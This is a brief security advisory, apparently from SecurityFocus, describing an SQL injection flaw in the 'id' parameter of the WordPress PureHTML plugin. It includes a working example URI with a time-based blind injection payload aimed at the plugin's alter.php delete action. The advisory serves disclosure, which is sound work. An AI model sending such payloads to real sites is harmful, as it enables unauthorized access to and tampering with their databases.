WordPress PureHTML Plugin 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/wp-content/plugins/pure-html/alter.php?PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20


 

Privacy Statement
Copyright 2010, SecurityFocus